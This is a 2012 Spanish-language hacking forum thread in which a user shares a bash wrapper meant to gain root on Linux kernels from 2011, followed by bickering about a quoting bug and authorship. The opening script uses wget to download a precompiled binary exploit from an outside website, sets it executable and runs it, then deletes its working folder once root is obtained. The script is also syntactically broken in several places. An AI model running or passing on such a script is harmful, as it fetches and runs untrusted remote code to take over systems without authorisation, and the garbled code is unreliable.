r00t Expl0it [Casi Todos Los 2011]

Iniciado por Dedalo, Junio 23, 2012, 03:26:29 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 23, 2012, 03:26:29 AM Ultima modificación: Junio 23, 2012, 03:47:50 AM por SeguridadBlanca.Com
Bueno es simple este root expl0it ya está compilado yo solo he adaptado un .sh para que se ejecute bien.

Código: bash


#! / Bin / sh
# By n30-h4ck3r Edited Dedalo 4 Underc0de


checkroot function {
if ["$ (id-u)" = "0"]; then
cd ..;
rm-r underc0de;
echo "Eres r00t ";
exit;
else
echo "No se puedo r00tear sigues siendo el usuario" 'whoami';
echo "";
fi;
}

uname-a;
mkdir underc0de;
cd underc0de;
echo "Checking if already root ...";
checkroot;

wget http://alexoloughlinsplace.com/forum/NewDir/z1d-2011;
chmod 0777 z1d-2011;
./z1d-2011;
checkroot;



Sirve para casi todos los Kernels del 2011



Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

hay un error en la linea 13 en las comillas simples bye,....

Tenias razón disculpa es por lo que estaba en un word.


Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Junio 23, 2012, 03:56:13 AM #3 Ultima modificación: Junio 23, 2012, 03:59:25 AM por aura16
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Tenias razón disculpa es por lo que estaba en un word.


Saludos,
Dedalo

Amigo la forma correcta de escribirlo es asi

Código: php
echo "No se puedo r00tear sigues siendo el usuario ".'whoami';

sino te tira un error D:
tienes que concadenar con un punto, no es por ser mala onda pero apuesto que el codigo no es tuyo D:

bueno pero para lo que se ocupa la funcion esta bien adios




pues que raro yo lo he testeado mas de 1 vez y nunca me ha tirado el error al compilarlo... y en cuanto a que yo lo haya hecho dice bien claro en el codigo:


Código: bash
# By n30-h4ck3r Edited Dedalo 4 Underc0de



El codigo era para r00tear con otro r00t expl0it h0llyShit Me parece... yo no lo he hecho pero que raro porque si me ha funcionado antes...



Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

LOL, claro que te iva a funcionar porque el error de la funcion estava en la parte donde no podias testear en lo demas estava bien :D
esque como tenias el logo de php en tu avatar pense que savias mucho... y un error asi en un experto no se perdona D: pero me di cuenta que no saves D:

y como dice # By n30-h4ck3r Edited Dedalo 4 Underc0de pero tambien digiste que lo adaptaste pues no se save que modificaciones ayas echo XD

no queria echarte a perder tu post D:

yo no me ofendo bro y que sepa php no significa que sepa todos los lenguajes, aquí yo no he venido a enseñar sino también para aprender y es que el problema radica en que cuando no me hace root me dice: No se puedo r00tear sigues siendo el usuario y nada mas... por otro lado si veo ofensiva la manera como te diriges y generalizas... diciendo que no se, además no he dicho por ningun lado que soy un experto, por otro lado, ya te explique este code estaba hecho para usar con el h0lly Shit me parece...  y el Avatar me lo hicieron yo no soy diseñador.


Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antes q nada, no olvidar que todos somos parte de Underc0de y brindamos nuestro conocimiento tanto como nos nutrimos del de los demás, todos podemos tener errores, considero q el aporte de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es de conflagración de un exploit que estando adaptado puede tener algún fallo, la idea de remarcar el error es q todos aprendamos donde esta y cual es la forma de corregirlo, no humillar...

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

estabien calma...
yo tambien bengo a aprender XD

Hubiese sido fácil poner el link del r00t expl0it compilado y ya ven ustedes como usarlo pero busqué otro code en bash y lo traté de adaptar, lo hice por ser buena gente... y sin embargo me he ganado un... No sabes Nada y te crees experto... Gracias U_U


Saludos,
Dedalo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

JAJAJJAJAJ Recordé leer por el foro un coment que decía No ahí lugar para Cursilerias en el Underground Abrazo me fui a dormir!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Cierro hilo, lo desviaron del tema principal.
Twitter: @The_Pr0ph3t
[email protected]